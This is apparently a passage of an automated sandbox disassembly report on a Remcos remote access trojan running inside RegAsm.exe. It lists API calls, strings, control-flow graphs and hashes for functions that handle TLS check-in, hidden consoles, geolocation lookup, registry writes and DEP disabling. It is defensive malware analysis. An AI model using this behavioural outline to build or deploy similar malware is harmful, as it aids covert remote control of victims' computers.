                                                                                              • SetProcessDEPPolicy.KERNEL32(00000000,00000000), ref: 0040A4E3
                                                                                              • CreateThread.KERNEL32(00000000,00000000,Function_0000A6C0,00000000,00000000,00000000), ref: 0040A4EF
                                                                                              • DeleteFileW.KERNEL32(00000000), ref: 0040A5B2
                                                                                                • Part of subcall function 0040BE14: __EH_prolog.LIBCMT ref: 0040BE19
                                                                                              • Sleep.KERNEL32(0000000A), ref: 0040A5A2
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: AddressProc$Module$Handle$LibraryLoad$CreateFileThread$DeleteH_prologNamePolicyProcessSleep
                                                                                              • String ID: Access Level: $Administrator$C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$Exe$Remcos Agent initialized$Software\$User$\~F$\~F$del$del$licence$license_code.txt
                                                                                              • API String ID: 4062606258-4101538746
                                                                                              • Opcode ID: c3d4a15f8a9bdced3346377a441b2e8cec02f984c11fa757a7c64ca1e78d474d
                                                                                              • Instruction ID: bf820840e173d3e8500347ecd1b7a27ce46e39732b77903c3f998a6fae3a9d47
                                                                                              • Opcode Fuzzy Hash: c3d4a15f8a9bdced3346377a441b2e8cec02f984c11fa757a7c64ca1e78d474d
                                                                                              • Instruction Fuzzy Hash: 66A1903071430067C619BB769D57A6E269A9BC0709F10493FF6467B2C2EEBC9E09825E
                                                                                              Function 00415A94 Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 74windowCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 1216 415a94-415a9f 1217 415b70-415b85 CreatePopupMenu AppendMenuA 1216->1217 1218 415aa5-415aaa 1216->1218 1219 415b8b 1217->1219 1220 415ab0-415ab5 1218->1220 1221 415b55-415b59 1218->1221 1223 415b8d-415b90 1219->1223 1224 415ac2-415aca 1220->1224 1225 415ab7-415ac0 1220->1225 1221->1219 1222 415b5b-415b6a Shell_NotifyIconA ExitProcess 1221->1222 1227 415b19-415b27 IsWindowVisible 1224->1227 1228 415acc-415acf 1224->1228 1226 415adc-415ae5 DefWindowProcA 1225->1226 1226->1223 1231 415b39-415b53 ShowWindow SetForegroundWindow 1227->1231 1232 415b29-415b37 ShowWindow 1227->1232 1229 415ad1-415ad7 1228->1229 1230 415aea-415b17 GetCursorPos SetForegroundWindow TrackPopupMenu 1228->1230 1229->1226 1230->1219 1231->1219 1232->1219
                                                                                              APIs
                                                                                              • DefWindowProcA.USER32(?,00000401,?,?), ref: 00415ADF
                                                                                              • GetCursorPos.USER32(?), ref: 00415AEE
                                                                                              • SetForegroundWindow.USER32(?), ref: 00415AF7
                                                                                              • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 00415B11
                                                                                              • Shell_NotifyIconA.SHELL32(00000002,00467A48), ref: 00415B62
                                                                                              • ExitProcess.KERNEL32 ref: 00415B6A
                                                                                              • CreatePopupMenu.USER32 ref: 00415B70
                                                                                              • AppendMenuA.USER32(00000000,00000000,00000000,Close), ref: 00415B85
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
                                                                                              • String ID: Close
                                                                                              • API String ID: 1657328048-3535843008
                                                                                              • Opcode ID: 0546807ff0dfdb21d565875a13234ba030253c9d63a8daf62b7c3dde853b2a01
                                                                                              • Instruction ID: 69ed41baf8013df7edb6dd8303528d2548f60f9075be42ed23a298a7982cfa74
                                                                                              • Opcode Fuzzy Hash: 0546807ff0dfdb21d565875a13234ba030253c9d63a8daf62b7c3dde853b2a01
                                                                                              • Instruction Fuzzy Hash: B6213935558208EFDB055FA4ED0EEEA3F25FB45311F000175FA06905B0E7B69960EB5A
                                                                                              Function 0040170E Relevance: 19.4, APIs: 4, Strings: 7, Instructions: 144networkCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 1233 40170e-40172e connect 1234 401861-401865 1233->1234 1235 401734-401737 1233->1235 1238 401867-401875 WSAGetLastError 1234->1238 1239 4018dd 1234->1239 1236 40185d-40185f 1235->1236 1237 40173d-401740 1235->1237 1240 4018df-4018e4 1236->1240 1241 401742-401769 call 402a91 call 402178 call 413bcc 1237->1241 1242 40176c-401776 call 419105 1237->1242 1238->1239 1243 401877-40187a 1238->1243 1239->1240 1241->1242 1252 401787-401794 call 419329 1242->1252 1253 401778-401782 1242->1253 1245 4018b7-4018bc 1243->1245 1246 40187c-4018b5 call 414e7e call 402a6d call 402178 call 413bcc call 402091 1243->1246 1249 4018c1-4018da call 402178 * 2 call 413bcc 1245->1249 1246->1239 1249->1239 1265 401796-4017b9 call 402178 * 2 call 413bcc 1252->1265 1266 4017cd-4017d8 call 419e09 1252->1266 1253->1249 1295 4017bc-4017c8 call 41914b 1265->1295 1278 40180a-40180d call 4192a0 1266->1278 1279 4017da-401808 call 402178 * 2 call 413bcc call 419552 1266->1279 1289 401812-401817 1278->1289 1279->1295 1292 401819-40183c call 402178 * 2 call 413bcc 1289->1292 1293 40183f-40185a CreateEventW * 2 1289->1293 1292->1293 1293->1236 1295->1239
                                                                                              APIs
                                                                                              • connect.WS2_32(?,?,?), ref: 00401726
                                                                                              • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,?,?,004049AA,?,?,?), ref: 00401846
                                                                                              • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,?,?,004049AA,?,?,?), ref: 00401854
                                                                                              • WSAGetLastError.WS2_32(?,?,?,004049AA,?,?,?), ref: 00401867
                                                                                                • Part of subcall function 00413BCC: GetLocalTime.KERNEL32(00000000), ref: 00413BE6
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CreateEvent$ErrorLastLocalTimeconnect
                                                                                              • String ID: Connection Failed: $Connection Refused$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
                                                                                              • API String ID: 994465650-2151626615
                                                                                              • Opcode ID: 1c54c5068daf1068fefbfe2c49c732229a8d88e2a8d15b26967a20f7aac60d87
                                                                                              • Instruction ID: cc572a4a7b8cc2dd4c8a1b63f7d6ff9f2a059f33d68be0fa136a37d341ce95d8
                                                                                              • Opcode Fuzzy Hash: 1c54c5068daf1068fefbfe2c49c732229a8d88e2a8d15b26967a20f7aac60d87
                                                                                              • Instruction Fuzzy Hash: CB41E531B10201B7DB147BBA891F96D7A26AB82309B40412FEC01276D3EA7D9D1987DF
                                                                                              Function 004490DF Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272COMMONLIBRARYCODE
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 1308 4490df-44910f call 448e42 1311 449111-44911c call 434243 1308->1311 1312 44912a-449136 call 442506 1308->1312 1319 44911e-449125 call 434256 1311->1319 1317 44914f-449198 call 448dad 1312->1317 1318 449138-44914d call 434243 call 434256 1312->1318 1328 449205-44920e GetFileType 1317->1328 1329 44919a-4491a3 1317->1329 1318->1319 1326 449401-449407 1319->1326 1330 449257-44925a 1328->1330 1331 449210-449241 GetLastError call 434220 CloseHandle 1328->1331 1333 4491a5-4491a9 1329->1333 1334 4491da-449200 GetLastError call 434220 1329->1334 1337 449263-449269 1330->1337 1338 44925c-449261 1330->1338 1331->1319 1347 449247-449252 call 434256 1331->1347 1333->1334 1339 4491ab-4491d8 call 448dad 1333->1339 1334->1319 1343 44926d-4492bb call 44244f 1337->1343 1344 44926b 1337->1344 1338->1343 1339->1328 1339->1334 1350 4492bd-4492c9 call 448fbe 1343->1350 1351 4492cb-4492ef call 448b60 1343->1351 1344->1343 1347->1319 1350->1351 1357 4492f3-4492fd call 43e630 1350->1357 1358 4492f1 1351->1358 1359 449302-449345 1351->1359 1357->1326 1358->1357 1361 449366-449374 1359->1361 1362 449347-44934b 1359->1362 1363 4493ff 1361->1363 1364 44937a-44937e 1361->1364 1362->1361 1366 44934d-449361 1362->1366 1363->1326 1364->1363 1367 449380-4493b3 CloseHandle call 448dad 1364->1367 1366->1361 1370 4493b5-4493e1 GetLastError call 434220 call 442618 1367->1370 1371 4493e7-4493fb 1367->1371 1370->1371 1371->1363
                                                                                              APIs
                                                                                                • Part of subcall function 00448DAD: CreateFileW.KERNEL32(00000000,00000000,?,00449188,?,?,00000000,?,00449188,00000000,0000000C), ref: 00448DCA
                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,FF8BC35D), ref: 004491F3
                                                                                              • __dosmaperr.LIBCMT ref: 004491FA
                                                                                              • GetFileType.KERNEL32(00000000), ref: 00449206
                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,FF8BC35D), ref: 00449210
                                                                                              • __dosmaperr.LIBCMT ref: 00449219
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00449239
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00449383
                                                                                              • GetLastError.KERNEL32 ref: 004493B5
                                                                                              • __dosmaperr.LIBCMT ref: 004493BC
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                              • String ID: H
                                                                                              • API String ID: 4237864984-2852464175
                                                                                              • Opcode ID: 8d7a2b3c8dcf4971788ba7bd61f1ef9ec662810f8d5bf56b9beabc5b2d52b55d
                                                                                              • Instruction ID: 16c0764251db30d38a12b5a8a02ae212f1302cce09ed6aaf32cd13814bbbde86
                                                                                              • Opcode Fuzzy Hash: 8d7a2b3c8dcf4971788ba7bd61f1ef9ec662810f8d5bf56b9beabc5b2d52b55d
                                                                                              • Instruction Fuzzy Hash: F2A13732A141049FEF19DF68DC527AF7BA0AB4A324F14019EF811EB391DB789C12DB59
                                                                                              Function 00415962 Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 48windowstringCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0041597B
                                                                                                • Part of subcall function 00415A14: RegisterClassExA.USER32(00000030), ref: 00415A60
                                                                                                • Part of subcall function 00415A14: CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 00415A7B
                                                                                                • Part of subcall function 00415A14: GetLastError.KERNEL32 ref: 00415A85
                                                                                              • ExtractIconA.SHELL32(00000000,?,00000000), ref: 004159B2
                                                                                              • lstrcpynA.KERNEL32(00467A60,Remcos,00000080), ref: 004159CC
                                                                                              • Shell_NotifyIconA.SHELL32(00000000,00467A48), ref: 004159E2
                                                                                              • TranslateMessage.USER32(?), ref: 004159EE
                                                                                              • DispatchMessageA.USER32(?), ref: 004159F8
                                                                                              • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00415A05
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
                                                                                              • String ID: Remcos
                                                                                              • API String ID: 1970332568-165870891
                                                                                              • Opcode ID: 6840af3b0f868fa075757d5fdcec3e3c970199560f76d4881f8831560035f363
                                                                                              • Instruction ID: c8a284d08dd33ebe47548fa3d4bc7f9e15ad04814d582944d5373042d6cfd863
                                                                                              • Opcode Fuzzy Hash: 6840af3b0f868fa075757d5fdcec3e3c970199560f76d4881f8831560035f363
                                                                                              • Instruction Fuzzy Hash: E5018471944248EBD7109FE1ED4CEDF7BBCEB86B09F00013AF50592560EBB84545CB6A
                                                                                              Function 00415128 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 74memoryCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 1382 415128-415145 AllocConsole GetConsoleWindow 1383 415150-41518f call 433e83 call 4377e9 SetConsoleOutputCP call 4150e5 call 42ec70 1382->1383 1384 415147-41514a ShowWindow 1382->1384 1393 415190-415196 1383->1393 1384->1383 1393->1393 1394 415198-4151a5 1393->1394 1395 4151a6-4151ac 1394->1395 1395->1395 1396 4151ae-4151b9 1395->1396 1397 4151ba-4151c0 1396->1397 1397->1397 1398 4151c2-4151de call 413981 1397->1398
                                                                                              APIs
                                                                                              • AllocConsole.KERNEL32(00467C58), ref: 00415131
                                                                                              • GetConsoleWindow.KERNEL32 ref: 00415137
                                                                                              • ShowWindow.USER32(00000000,00000000), ref: 0041514A
                                                                                              • SetConsoleOutputCP.KERNEL32(000004E4,?,?,?,?,?), ref: 00415171
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Console$Window$AllocOutputShow
                                                                                              • String ID: Remcos v$5.1.3 Light$CONOUT$
                                                                                              • API String ID: 4067487056-1171708759
                                                                                              • Opcode ID: 87430e1f32c0a6d9d60f2d4c136371f3dc9c3f062405f2ca1438f242223721d4
                                                                                              • Instruction ID: dee782cc1d132fa0a2354ebe19e16e3023016d6370a6d64ff70c1a6108a5807a
                                                                                              • Opcode Fuzzy Hash: 87430e1f32c0a6d9d60f2d4c136371f3dc9c3f062405f2ca1438f242223721d4
                                                                                              • Instruction Fuzzy Hash: 7F115B72D047006ACA11EF955C06FCBB7A99F92B01F100563FC48BF142D6E6294A86AD
                                                                                              Function 00413A60 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 70networkfileCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              • InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00413A88
                                                                                              • InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 00413A9F
                                                                                              • InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 00413AB6
                                                                                              • InternetCloseHandle.WININET(00000000), ref: 00413AF6
                                                                                              • InternetCloseHandle.WININET(?), ref: 00413AFB
                                                                                              Strings
                                                                                              • http://geoplugin.net/json.gp, xrefs: 00413A96
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Internet$CloseHandleOpen$FileRead
                                                                                              • String ID: http://geoplugin.net/json.gp
                                                                                              • API String ID: 3121278467-91888290
                                                                                              • Opcode ID: 03cc498f1f2dad69004204c4c8f5ce4e797067741d760ec7f35896daa75edb69
                                                                                              • Instruction ID: 67adef18b0c7e69bcd0bcbcd75fed6ea5b558425969ab8ef97af71e1a12f261e
                                                                                              • Opcode Fuzzy Hash: 03cc498f1f2dad69004204c4c8f5ce4e797067741d760ec7f35896daa75edb69
                                                                                              • Instruction Fuzzy Hash: 9E11B135A01214BBCB24ABA6CD49DEF7FBCDF06760F10007EF905B2280DAB85E40C6A4
                                                                                              Function 004139A6 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 60COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 1419 4139a6-4139fa call 414452 call 40d033 call 40209b call 402091 call 408674 1430 413a3d-413a46 1419->1430 1431 4139fc-413a0b call 40d033 1419->1431 1433 413a48-413a4d 1430->1433 1434 413a4f 1430->1434 1436 413a10-413a27 call 402028 StrToIntA 1431->1436 1435 413a54-413a5f call 402c89 1433->1435 1434->1435 1441 413a35-413a38 call 402091 1436->1441 1442 413a29-413a32 call 415327 1436->1442 1441->1430 1442->1441
                                                                                              APIs
                                                                                                • Part of subcall function 00414452: GetCurrentProcess.KERNEL32(00000001,?,00000000,0040907E,WinDir,00000000,00000000), ref: 00414463
                                                                                                • Part of subcall function 0040D033: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,00000000), ref: 0040D057
                                                                                                • Part of subcall function 0040D033: RegQueryValueExA.KERNEL32(00000000,?,00000000,00000000,?,00000400), ref: 0040D074
                                                                                                • Part of subcall function 0040D033: RegCloseKey.KERNEL32(00000000), ref: 0040D07F
                                                                                              • StrToIntA.SHLWAPI(00000000,0045F27C,?,00000000,00000000,?,00467E5C,Exe,00000000,0000000E,00000000,004595AC,00000003,00000000), ref: 00413A1C
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CloseCurrentOpenProcessQueryValue
                                                                                              • String ID: (32 bit)$ (64 bit)$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                                                              • API String ID: 1866151309-2070987746
                                                                                              • Opcode ID: 052e2c1fc00a128160fe2af221e6638f3098fcde06c4f7ab9f2ba3b538be2306
                                                                                              • Instruction ID: 1917af8823246703e0b69b16f84be6404e949fb754efc197e49d965c963a868a
                                                                                              • Opcode Fuzzy Hash: 052e2c1fc00a128160fe2af221e6638f3098fcde06c4f7ab9f2ba3b538be2306
                                                                                              • Instruction Fuzzy Hash: B01106B0A402405AC600F7A59D4BAAFB7589B44309F94017FFA45A31D3EAAD1D8D82AF
                                                                                              Function 0043C698 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 53COMMONLIBRARYCODE
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 1446 43c698-43c6af GetLastError 1447 43c6b1-43c6bb call 43d27d 1446->1447 1448 43c6bd-43c6c4 call 43af95 1446->1448 1447->1448 1453 43c70e-43c715 SetLastError 1447->1453 1452 43c6c9-43c6cf 1448->1452 1454 43c6d1 1452->1454 1455 43c6da-43c6e8 call 43d2d3 1452->1455 1456 43c717-43c71c 1453->1456 1457 43c6d2-43c6d8 call 43beb5 1454->1457 1462 43c6ea-43c6eb 1455->1462 1463 43c6ed-43c703 call 43c486 call 43beb5 1455->1463 1465 43c705-43c70c SetLastError 1457->1465 1462->1457 1463->1453 1463->1465 1465->1456
                                                                                              APIs
                                                                                              • GetLastError.KERNEL32(C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000000,00000000,00432251,00000000,00467F30,?,004322D5,00000000,00000000,00000000,00000000,00000000,?,00467F30), ref: 0043C69D
                                                                                              • _free.LIBCMT ref: 0043C6D2
                                                                                              • _free.LIBCMT ref: 0043C6F9
                                                                                              • SetLastError.KERNEL32(00000000), ref: 0043C706
                                                                                              • SetLastError.KERNEL32(00000000), ref: 0043C70F
                                                                                              Strings
                                                                                              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, xrefs: 0043C69C
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ErrorLast$_free
                                                                                              • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                              • API String ID: 3170660625-1068371695
                                                                                              • Opcode ID: b6e52e1b2361af0078c8cb005ea30ec949651885794170a776e383e0b3a38326
                                                                                              • Instruction ID: bc4159b708f5a4293034d87da73aa0aa4050a2000ac7bf9c59918bad1b3ef628
                                                                                              • Opcode Fuzzy Hash: b6e52e1b2361af0078c8cb005ea30ec949651885794170a776e383e0b3a38326
                                                                                              • Instruction Fuzzy Hash: E101DB7554460167861167766CCAD6B175AABDA3A9F20202BFD15B2292EB6CCC01431D
                                                                                              Function 00401AEF Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 128synchronizationthreadCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,00000000,00000000,?,?,000000FF,00000000,00000000,?), ref: 00401BDC
                                                                                              • CreateThread.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 00401BEF
                                                                                              • WaitForSingleObject.KERNEL32(?,000000FF,?,;J@,00401AC2,?,?,;J@,?,00000000,00000000,00000000,00000000,?), ref: 00401BFA
                                                                                              • CloseHandle.KERNEL32(?,?,;J@,00401AC2,?,?,;J@,?,00000000,00000000,00000000,00000000,?), ref: 00401C03
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Create$CloseEventHandleObjectSingleThreadWait
                                                                                              • String ID: ;J@
                                                                                              • API String ID: 3360349984-2872391036
                                                                                              • Opcode ID: ad49de1a7ead4e787bf1e6030da1dbcc69cdf8ec2f71a5055db8e1f4714ca59b
                                                                                              • Instruction ID: 4c3b87f8b26e421484a5416da664749deae10a416ef7c933f3c1033e637f22ec
                                                                                              • Opcode Fuzzy Hash: ad49de1a7ead4e787bf1e6030da1dbcc69cdf8ec2f71a5055db8e1f4714ca59b
                                                                                              • Instruction Fuzzy Hash: E2417171A00318ABDF11EBA1CD459EEB7BDAF14328F04012AF552B32D1DB78A905C764
                                                                                              Function 00415A14 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 57registryCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 1562 415a14-415a69 call 42ec70 RegisterClassExA 1565 415a8b 1562->1565 1566 415a6b-415a83 CreateWindowExA 1562->1566 1568 415a8d-415a93 1565->1568 1567 415a85 GetLastError 1566->1567 1566->1568 1567->1565
                                                                                              APIs
                                                                                              • RegisterClassExA.USER32(00000030), ref: 00415A60
                                                                                              • CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 00415A7B
                                                                                              • GetLastError.KERNEL32 ref: 00415A85
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ClassCreateErrorLastRegisterWindow
                                                                                              • String ID: 0$MsgWindowClass
                                                                                              • API String ID: 2877667751-2410386613
                                                                                              • Opcode ID: 171986d441cc0fdba3aa014d35ecb3b22f7763cc9b94a58783fd8344a93d0701
                                                                                              • Instruction ID: f63745ccf0cf2e059edbdb5c197b6e0c42188d60e7481a6116dcff7c28758ec6
                                                                                              • Opcode Fuzzy Hash: 171986d441cc0fdba3aa014d35ecb3b22f7763cc9b94a58783fd8344a93d0701
                                                                                              • Instruction Fuzzy Hash: 9A0129B5D0021DAFDB00DFD59CC49EFBBBCFA49395F40453AF814A6240E77449088BA4
                                                                                              Function 004150E5 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetStdHandle.KERNEL32(000000F5,?,?,?,?,?,?,?,0041517C,?,?,?,?,?), ref: 004150EF
                                                                                              • GetConsoleScreenBufferInfo.KERNEL32(00000000,?,?,?,?,?,?,?,?,0041517C,?,?,?,?,?), ref: 004150FC
                                                                                              • SetConsoleTextAttribute.KERNEL32(00000000,0000000C,?,?,?,?,?,?,?,0041517C,?,?,?,?,?), ref: 00415109
                                                                                              • SetConsoleTextAttribute.KERNEL32(00000000,?,?,?,?,?,?,?,?,0041517C,?,?,?,?,?), ref: 0041511C
                                                                                              Strings
                                                                                              • ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/ , xrefs: 0041510F
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Console$AttributeText$BufferHandleInfoScreen
                                                                                              • String ID: ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/
                                                                                              • API String ID: 3024135584-2418719853
                                                                                              • Opcode ID: cada3afb149ddae7817ec8520d72f52702fcff0883308cdb62645d729372a309
                                                                                              • Instruction ID: 51ccb5ed899ab14f6f5ebcdeb72e3bd2cd834a6bdf3d7eb62036f2204a89400a
                                                                                              • Opcode Fuzzy Hash: cada3afb149ddae7817ec8520d72f52702fcff0883308cdb62645d729372a309
                                                                                              • Instruction Fuzzy Hash: 5FE048B694420877D6102BA5AC4FC6F7B6CE78EA13B100666FE1191193D97454054675
                                                                                              Function 00401D6F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58timethreadCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetLocalTime.KERNEL32(00000001,00000000,00468140,?,?,?,?,0040F696,?,00000001), ref: 00401D9F
                                                                                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00468140,?,?,?,?,0040F696,?,00000001), ref: 00401DEB
                                                                                              • CreateThread.KERNEL32(00000000,00000000,00401F6E,?,00000000,00000000), ref: 00401DFE
                                                                                              Strings
                                                                                              • KeepAlive | Enabled | Timeout: , xrefs: 00401DB2
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Create$EventLocalThreadTime
                                                                                              • String ID: KeepAlive | Enabled | Timeout:
                                                                                              • API String ID: 2532271599-1507639952
                                                                                              • Opcode ID: 643c94547ab4d4b904c412cc660adc4f41d1d22a7e1bff7dec1c8fcd1f37be2e
                                                                                              • Instruction ID: 14f6ff0f928cbc8e7ea3c6c14a44142007350dfeddf002f6c212d4b5ee299eb4
                                                                                              • Opcode Fuzzy Hash: 643c94547ab4d4b904c412cc660adc4f41d1d22a7e1bff7dec1c8fcd1f37be2e
                                                                                              • Instruction Fuzzy Hash: FE11E3319042847BCB20A77B8C0DEAB7FA89BD3710F04056FF841522A2D6B89485C7A6
                                                                                              Function 0040D202 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 38registryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 0040D211
                                                                                              • RegSetValueExA.KERNEL32(?,00459EE8,00000000,?,00000000,00000000,00467F30,?,?,0040A763,00459EE8,5.1.3 Light), ref: 0040D239
                                                                                              • RegCloseKey.KERNEL32(?,?,?,0040A763,00459EE8,5.1.3 Light), ref: 0040D244
